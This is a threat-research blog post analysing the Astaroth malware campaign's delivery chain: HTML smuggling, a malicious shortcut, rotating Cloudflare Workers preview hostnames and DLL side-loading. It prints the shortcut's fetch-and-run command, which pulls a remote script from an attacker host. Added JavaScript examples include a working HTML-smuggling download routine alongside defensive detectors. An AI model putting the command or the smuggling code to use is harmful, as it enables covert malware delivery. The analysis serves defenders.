Threat Actor behind Astaroth is now using Cloudflare Workers to bypass your Security Solutions.

Marcel Afrahim on 2019-08-26


TL;DR? Skip to the Final Comments. Update: Cloudflare fixed the misuse.

You might have seen the recently published report by the Microsoft research team about a widespread fileless campaign called Astaroth that completely “lived off the land”: it only ran system tools throughout a complex attack chain. If you haven’t, you SHOULD definitely read the details of the Microsoft team’s research article here.

Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack (www.microsoft.com)

Following the report, the group behind the Astaroth campaign changed tactics and ran a similar campaign again earlier in August with a few changes, most notably the use of Cloudflare Workers. In this article I will highlight those changes and show a clear chain of attack from delivery to infection, something the Microsoft article did not do.

Let’s go.

First Stage:

The actors behind the campaign used classic social engineering in this step. They sent a typical message that looks like any of the automated emails organizations get about audit or billing requests. It carries an HTML attachment that makes no attempt to hide that it is an HTML file. But this is not a simple HTML file with external links to malware: it is carefully crafted and contains obfuscated JavaScript code.

Source code of the HTML page

I will not bore you with the de-obfuscation steps, but here is the end result and what the browser actually renders. Isn’t it beautiful?

So simple

Let’s inspect:

First off, there is a simple base64-string-to-ArrayBuffer function. Next is the base64-encoded URL used to retrieve the next step of the attack. The third section fetches that URL, builds a Blob object in the browser’s memory from the returned data and auto-downloads it in the user’s browsing session. The other sections of the file are just filler and contribute nothing to the process.

hxxp://eaep3xmsaaen[.]promotoradenegocios.com[.]de/5M0BFVGS02W/34284/Duplicata_LeaoBravo_04132583.htm

Let’s look at the URL above more closely. While it might look like just another HTML page, the domain sits behind Cloudflare’s vast web infrastructure. There are two main reasons for that.

1. By fronting the site with Cloudflare, the threat actors add a layer of protection: sandboxes or automated analysis tools receive the Cloudflare challenge page rather than the actual payload.

2. While it might look like a static page, it is generated by PHP and returns different content depending on the visitor’s IP address. Cloudflare’s IP geolocation feature adds a header called “CF-IPCountry” to every request it forwards to the origin server, so the origin can key on it without doing its own lookup. Only visitors from Brazilian IP ranges get the page with the actual second-stage payload.

This is the JSON payload returned from the URL, which we will dig into later.

JSON returned to Brazilian IP address.

To produce the second stage, the JSON from the URL is parsed, the base64 field is converted to an ArrayBuffer and written to a Blob in the browser, the Blob is given the same name as the HTML file, and a link pointing at it is created and auto-clicked so the browser downloads it.

What the download looks like in Chrome.

Second stage:

The second stage starts with the zip file that was just created from the data returned by the URL. Creating the file this way has a few advantages over simply downloading a static zip.

1. The threat actor can generate different files for different targets and serve them all from one endpoint.

2. Network controls might block file downloads, but JSON is a natural part of web traffic and is far less likely to be blocked.

3. Some security vendors can identify file objects in network traffic and submit them for analysis. That would jeopardize the operation quickly, since IOCs could be distributed worldwide in no time.
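To make the first two stages concrete, here is an added example (JavaScript written for this page, not the campaign’s code or the post’s) that reconstructs the exchange described above end to end: an origin that keys on the CF-IPCountry header, the attachment’s base64-to-ArrayBuffer-to-Blob download, and the check a proxy or sandbox would need in order to spot a file hidden inside a JSON response. The JSON key name, the header values, the sample archive bytes and the signature table are assumptions or constructed inputs; the post shows the JSON but not its field names.

```javascript
// Added example, not the campaign's or the post's code. Reconstructs the
// stage-1 exchange so each piece can be exercised offline under Node.

// Constructed sample: a ZIP local-file-header prefix (PK\x03\x04) plus
// filler, standing in for the real archive the JSON carried.
const SAMPLE_ZIP = Buffer.concat([
  Buffer.from([0x50, 0x4b, 0x03, 0x04]),
  Buffer.from('stand-in for the shortcut archive'),
]);

// Case-insensitive header lookup: Cloudflare sends "CF-IPCountry", most
// server frameworks expose header names lowercased.
function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? '' : headers[key];
}

// Origin behaviour as the post describes it: only requests that Cloudflare
// tagged with CF-IPCountry: BR get the JSON carrying the base64 file; everyone
// else, sandboxes included, gets an innocuous page. The JSON key "data" is an
// assumption; the post shows the JSON but not its field names.
function originResponse(headers) {
  if (header(headers, 'CF-IPCountry').toUpperCase() !== 'BR') {
    return { status: 200, contentType: 'text/html', body: '<html><body>Nothing to see.</body></html>' };
  }
  return {
    status: 200,
    contentType: 'application/json',
    body: JSON.stringify({ data: SAMPLE_ZIP.toString('base64') }),
  };
}

// Client side, step 1: base64 string -> ArrayBuffer, the attachment's first function.
function base64ToArrayBuffer(b64) {
  const bin = typeof atob === 'function' ? atob(b64) : Buffer.from(b64, 'base64').toString('latin1');
  const bytes = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  return bytes.buffer;
}

// Client side, step 2: parse the JSON, decode it, wrap it in a Blob and click a
// generated download link named after the attachment. The DOM part runs only
// in a browser; under Node the decoded bytes are returned for inspection.
function smuggleDownload(jsonText, fileName) {
  const buf = base64ToArrayBuffer(JSON.parse(jsonText).data);
  if (typeof document !== 'undefined') {
    const a = document.createElement('a');
    a.href = URL.createObjectURL(new Blob([buf], { type: 'application/octet-stream' }));
    a.download = fileName;
    document.body.appendChild(a);
    a.click();
    URL.revokeObjectURL(a.href);
  }
  return new Uint8Array(buf);
}

// Defender side: walk a JSON body and flag string values that look like base64
// and decode to a known file signature. A control that only inspects "file
// downloads" never sees this; the file exists only after the browser decodes it.
const SIGNATURES = [
  { type: 'zip', magic: [0x50, 0x4b, 0x03, 0x04] },
  { type: 'pe',  magic: [0x4d, 0x5a] },
  { type: 'ole', magic: [0xd0, 0xcf, 0x11, 0xe0] },
];

function findSmuggledFiles(jsonText) {
  const hits = [];
  const walk = (node, path) => {
    if (typeof node === 'string') {
      if (node.length < 16 || !/^[A-Za-z0-9+/]+={0,2}$/.test(node)) return;
      const head = Buffer.from(node.slice(0, 8), 'base64');   // first 6 decoded bytes
      const sig = SIGNATURES.find(s => s.magic.every((b, i) => head[i] === b));
      if (sig) hits.push({ path, type: sig.type });
    } else if (node && typeof node === 'object') {
      for (const [k, v] of Object.entries(node)) walk(v, path ? `${path}.${k}` : k);
    }
  };
  walk(JSON.parse(jsonText), '');
  return hits;
}
```

Under Node, smuggleDownload returns the decoded bytes instead of triggering a download; in a browser the same function performs the download. The point of findSmuggledFiles is that the only place the file exists on the wire is as a base64 string inside application/json, so a download inspector has nothing to inspect; decoding the head of base64-looking strings and matching file signatures is cheap and catches exactly this pattern.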

The zip contains a shortcut (.lnk) with a modified target and icon.

Totally legitimate-looking shortcut!

%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev/?09/")" > %temp%\Lqncxmm:vbvvjjh.js && start wscript.exe %temp%\Lqncxmm:vbvvjjh.js”

Let’s dissect.

While it is less commonly known or used, “%ComSpec%” is a pre-assigned environment variable that by default holds the absolute path of cmd.exe, and it dates back to the DOS era. Next comes a GetObject call with a “script:” moniker, which makes Windows Script Host fetch the remote scriptlet and run it; the call is echoed into a .js file under %temp% and then started with wscript.exe. Note the output path, %temp%\Lqncxmm:vbvvjjh.js: the colon is NTFS alternate data stream syntax, so the script lands in a stream named vbvvjjh.js attached to a file called Lqncxmm, and a plain directory listing of %temp% shows no .js file at all. Now pay attention to the URL again: it contains %RANDOM%, a built-in cmd variable that expands to an integer from 0 to 32,767. Because cmd expands variables before the echo runs, a fresh number is substituted on every execution, so the URL written into the .js file, and therefore the hostname GetObject contacts, differs each time; that one variable alone yields up to 32,768 distinct hostnames per shortcut. To understand why any of those hostnames work, we need to understand how Cloudflare Workers work.
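The command line above can be pulled apart mechanically. The following is an added example (not code from the post or the campaign): a small JavaScript triage helper that expands cmd-style %VAR% references the way cmd.exe does before running the line (with an injectable %RANDOM%), extracts the script: moniker URL, the file the echo writes and what is launched, and flags the alternate data stream in the output path. The environment values and the regex-based parsing are assumptions made for the example; the sample command is the one from the shortcut above, with its defanged hxxps and [.] kept as they appear on the page.

```javascript
// Added example, not the campaign's or the post's code: triage of the
// shortcut's command line. Regex-based and tuned to the shape shown above.

// Assumed values for a default Windows install (not taken from the sample).
const DEFAULT_ENV = {
  ComSpec: 'C:\\Windows\\system32\\cmd.exe',
  temp: 'C:\\Users\\victim\\AppData\\Local\\Temp',
};

// cmd.exe's %RANDOM% yields 0..32767; injectable so results are reproducible.
const cmdRandom = () => Math.floor(Math.random() * 32768);

// Expand %NAME% the way cmd does before executing the line. Names are
// case-insensitive; unknown names are left untouched, as cmd leaves them.
function expandEnv(text, env = DEFAULT_ENV, random = cmdRandom) {
  return text.replace(/%([A-Za-z0-9_]+)%/g, (whole, name) => {
    if (name.toUpperCase() === 'RANDOM') return String(random());
    const key = Object.keys(env).find(k => k.toLowerCase() === name.toLowerCase());
    return key === undefined ? whole : env[key];
  });
}

// Turn the defanged form used in the post (hxxp, [.]) back into a real URL.
function refang(u) {
  return u.replace(/^hxxp/i, 'http').replace(/\[\.\]/g, '.');
}

// A colon in the final path component (after the drive letter has been
// stripped) is NTFS alternate data stream syntax: host:stream.
function parseOutputPath(p) {
  const leaf = p.replace(/^[A-Za-z]:/, '').split(/[\\/]/).pop();
  const i = leaf.indexOf(':');
  return {
    path: p,
    isAlternateDataStream: i > 0,
    hostFile: i > 0 ? leaf.slice(0, i) : leaf,
    streamName: i > 0 ? leaf.slice(i + 1) : null,
  };
}

function triageShortcutCommand(raw, env = DEFAULT_ENV, random = cmdRandom) {
  const line = raw.replace(/[“”]/g, '"');          // the post renders the quotes as curly
  const interp = line.match(/^\s*(%ComSpec%|\S*cmd\.exe)/i);
  const remoteScripts = [...line.matchAll(/GetObject\(\s*"script:([^"]+)"/gi)]
    .map(m => ({ template: m[1], example: refang(expandEnv(m[1], env, random)) }));
  const writes = [...line.matchAll(/>\s*([^\s&|]+)/g)]
    .map(m => parseOutputPath(expandEnv(m[1], env, random)));
  const launches = [...line.matchAll(/\bstart\s+(?:"[^"]*"\s+)?(\S+)\s+([^\s&|"]+)/gi)]
    .map(m => ({ program: m[1], argument: expandEnv(m[2], env, random) }));
  return {
    interpreter: interp ? expandEnv(interp[1], env, random) : null,
    remoteScripts,
    writes,
    launches,
  };
}

// The shortcut's command line as printed in the post (defanged, curly quotes).
const SAMPLE_LNK_COMMAND =
  '%ComSpec% /c “echo GetObject(“script:hxxps://xsw%RANDOM%nnccccmd95c22[.]cloudflareworkers[.]com' +
  '/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371' +
  'proud-glade-92ec.ativadormasterplus.workers.dev/?09/")" > %temp%\\Lqncxmm:vbvvjjh.js' +
  ' && start wscript.exe %temp%\\Lqncxmm:vbvvjjh.js”';
```

Feeding the sample through triageShortcutCommand yields cmd.exe as the interpreter, one script: URL whose host changes with every %RANDOM% draw, one write into the vbvvjjh.js stream of a file named Lqncxmm, and a wscript.exe launch of that same stream path; a hunt for `*.js` files in %temp% would miss it, while a rule on wscript.exe command lines containing a colon in the last path component would not.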

By everyone, they mean threat actors as well.

Cloudflare Workers derive their name from Web Workers, and more specifically Service Workers, the W3C standard API for scripts that run in the background in a web browser and intercept HTTP requests. Cloudflare Workers are written against the same standard API but run on Cloudflare’s servers, not in a browser. Cloudflare Workers lets you run JavaScript in Cloudflare’s hundreds of data centers around the world. Using a Worker, one can do a number of things, including:

All in all, Cloudflare Workers gives threat actors a resilient platform without the need to maintain any infrastructure of their own. Cloudflare Workers has a free plan that anyone, or anything, can sign up for and get 100,000 requests per day, and you can create an unlimited number of workers per account.

But you might still be asking how a URL with a random number in its subdomain could possibly work.

The Cloudflare Workers dashboard has a script editor that lets developers write and preview a script before deploying it to the network, something like jsfiddle.net if you wish. The preview renders the script on a different hostname every time it is run, except that it is not a real, provisioned hostname: it is a virtual one derived from the incoming request and the name given to the worker.

Let me show you an example:

Here I have a free worker running a simple script that just returns “Hello World” as the page content. There is a preview panel on the side that displays the changes I make when I press run.

Workers Script Editor

This is the general flow the Cloudflare script editor uses to preview the changes:

The preview panel is not served from the worker’s own address. If you open Chrome’s network panel, you will see the response coming from a different hostname every time.

First run.

The first run involves making a GET request to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which, after setting a cookie, redirects to

https://84efc29573641d2f04337907900ab249.cloudflareworkers.com

Second run.

Like the first run, the second run is making a GET request to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com/.edgeworker-fiddle-init-preview/ae634c73683563b82196ddb468eede951636ba7051b2f5171ba2ae69ae94b17b1muddy-surf-5e18.marcel.workers.dev/

which redirects to

https://327559932d6dbe26a9d576034fd615d2.cloudflareworkers.com

Now if I make an arbitrary change in the Workers name in the first GET request URL, the response is still the same. Here I replaced the first 5 digits with 12345 and the redirected page shows the same content.

voila!

Potentially this can produce a very large, effectively unlimited, number of hostnames that all execute a particular piece of code, which traditional anti-bot or blocking tools will fail to catch. Cloudflare Workers cannot host files themselves, but a worker can fetch from a static file hosting server and relay the response without revealing that server’s identity. Cloudflare’s documentation even provides an example:

https://developers.cloudflare.com/workers/recipes/static-site/

Remember the shortcut? Replace the %RANDOM% with any digits or letters and you end up with a preview URL that drops the script file.

hxxps://xsw12345nnccccmd95c22[.]cloudflareworkers[.]com/.edgeworker-fiddle-init-preview/6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371proud-glade-92ec.ativadormasterplus.workers.dev

Third Stage:

The script file is saved to %temp%\Lqncxmm:vbvvjjh.js and executed by the Windows Script Host process (wscript.exe). You can see how the threat actor turns this Cloudflare feature to their advantage: the authors added a simple random number generator and use it to randomize the URL from which the third-stage payload is downloaded.

such a simple function

The simple function above generates a random number within the range given as its parameter. For the third stage there are ten distinct Cloudflare Worker preview links, and for each of them the script splices in two random numbers between 20,000 and 50,000. That gives about 900 million variations (30,001 squared) for a single link, and ten times that across the set. I’ll let you work out how many traditional IOCs you would need to cover just this one simple script.

Randomization of download links
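Since the throwaway hostname carries no information, the useful move for a defender is to normalize such URLs to the parts that do not change. The following is an added example (JavaScript written for this page, not the campaign’s or Cloudflare’s code) that does this for the preview URL structure shown above and also reproduces the third-stage randomization just described, showing that every random variant collapses to one key. The URL layout (fixed path segment, 64-hex token, a single digit observed as 1 in every sample on this page, then name.account.workers.dev), the 20,000 to 50,000 range and the two slots per link come from the post; the {R} placeholder, the sample template and the key format are assumptions.

```javascript
// Added example, not the campaign's or Cloudflare's code: collapse Workers
// preview URLs to their stable parts, and reproduce the third-stage
// randomization to show how many variants map onto one key.

// Path layout as seen in every sample on the page: the fixed preview segment,
// a 64-hex token, one digit (observed as "1"; treated here as a separator,
// which is an assumption), then <name>.<account>.workers.dev.
const PREVIEW_RE =
  /^\/\.edgeworker-fiddle-init-preview\/([0-9a-f]{64})\d?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.workers\.dev)\/?/i;

// Turn the defanged form used in the post (hxxp, [.]) back into a real URL.
function refang(u) {
  return u.replace(/^hxxp/i, 'http').replace(/\[\.\]/g, '.');
}

// Returns the stable identifiers of a preview URL, or null for anything else.
// The subdomain of cloudflareworkers.com is reported but never used as a key.
function normalizePreviewUrl(raw) {
  let url;
  try { url = new URL(refang(raw)); } catch { return null; }
  if (!/\.cloudflareworkers\.com$/i.test(url.hostname)) return null;
  const m = url.pathname.match(PREVIEW_RE);
  if (!m) return null;
  const token = m[1].toLowerCase();
  const worker = m[2].toLowerCase();
  return { throwawayHost: url.hostname, token, worker, key: `${token}|${worker}` };
}

// Count how many distinct stable keys a list of observed URLs really contains.
function collapse(urls) {
  const counts = new Map();
  for (const u of urls) {
    const n = normalizePreviewUrl(u);
    const key = n ? n.key : u;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return counts;
}

// The third stage's behaviour as the post describes it: a random integer in
// [lo, hi] spliced into each link template at two places. "{R}" marks the
// slots; the template below is constructed for the example.
function randomBetween(lo, hi, rnd = Math.random) {
  return lo + Math.floor(rnd() * (hi - lo + 1));
}

function buildStageThreeUrl(template, rnd = Math.random) {
  return template.replace(/\{R\}/g, () => String(randomBetween(20000, 50000, rnd)));
}

// Distinct URLs one template can yield: (hi - lo + 1) ** slots.
function variantCount(template, lo = 20000, hi = 50000) {
  const slots = (template.match(/\{R\}/g) || []).length;
  return (hi - lo + 1) ** slots;
}

const SAMPLE_TEMPLATE =
  'https://x{R}y{R}z.cloudflareworkers.com/.edgeworker-fiddle-init-preview/' +
  '6a8db783ccc67c314de2767f33605caec2262527cbed408b4315c2e2d54cf0371' +
  'proud-glade-92ec.ativadormasterplus.workers.dev/';
```

The two preview URLs from the editor experiment above normalize to the same key even though their hostnames differ, and the shortcut’s URL normalizes to the token plus proud-glade-92ec.ativadormasterplus.workers.dev. For a URLhaus-style feed of observed links, collapse() reduces hundreds of entries to the handful of worker identities behind them, which is the indicator worth sharing.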

Searching for Astaroth samples on URLhaus shows that at least one analyst managed to grab the links and submit them to the site. But of course, each time the script runs, the URLs are different.

https://urlhaus.abuse.ch/browse/tag/Astaroth/

On systems running a 32-bit version of Windows, the Cloudflare links are not used; instead, a private Google Storage repository with a static link is used.

but why?

The most likely explanation is that they wanted to fool sandboxes and automated analysis tools, many of which still run 32-bit Windows images. By branching on architecture, the threat actors hand analysts a static IOC (the Google Storage link) while the randomized Cloudflare delivery stays intact for the real-world victims being infected.

Here is a sample run from the popular malware analysis platform Any.run. Just running the script and relying on the IOCs it generates hides the fact that Cloudflare is involved in this campaign at all.

mal.js (MD5: A9A285D4E129FA54F730F6B66F3AD3A7), interactive analysis on ANY.RUN (app.any.run)

The third stage involves a DLL downloaded from one of the links mentioned above and a technique called DLL side-loading, in which a legitimate program that expects to load its own DLLs ends up loading a malicious DLL of the same name from the current or a specified path.

In this case, the program at “C:\Program Files (x86)\Internet Explorer\ExtExport.exe” is used. ExtExport.exe is a legitimate binary that ships with Internet Explorer and loads certain DLLs from the path given to it as an argument.

ExtExport.exe is launched with the argument “C:\Users\Public\Libraries\win32”, a directory that contains the dropped files and the DLL concatenated from one of the downloads.

Renato Marinho of Morphus Labs has done a great job of analyzing the DLLs of another variant of the Astaroth malware, which is almost the same as the one seen earlier in August. According to his analysis of the samples involved, after the DLL side-loading, one of the Diebold Warsaw installation binaries (a security suite used on systems accessing online banking in Brazil) is hollowed and used to communicate with Facebook and YouTube profiles in order to obtain the final C2 addresses. It’s really cool; you should read it.

Guildma malware is now accessing Facebook and YouTube to keep up-to-date (morphuslabs.com)

Final Comments:

The threat actors currently behind the Astaroth campaign go to great lengths to escape detection and fool conventional security solutions. They use Cloudflare Workers and Cloudflare’s network to:

  1. Have a resilient, efficient and secure network for spreading payloads.
  2. Rely on trusted domain names and services to expand coverage.
  3. Hide from sandboxes and disrupt automated analysis tools.
  4. Generate random payload URLs for each run.
  5. Rebuild the operation with ease if it is compromised.

This specific threat actor has been known to use public cloud and storage services to deliver Astaroth payloads, but the latest use of Cloudflare Workers shows that the team is actively researching new techniques to blend in with legitimate traffic and hide their network traces inside infected organizations.

Update:

I have been informed that Cloudflare has implemented a fix for this abuse / misuse of Cloudflare Workers and the methods described in this article no longer work.
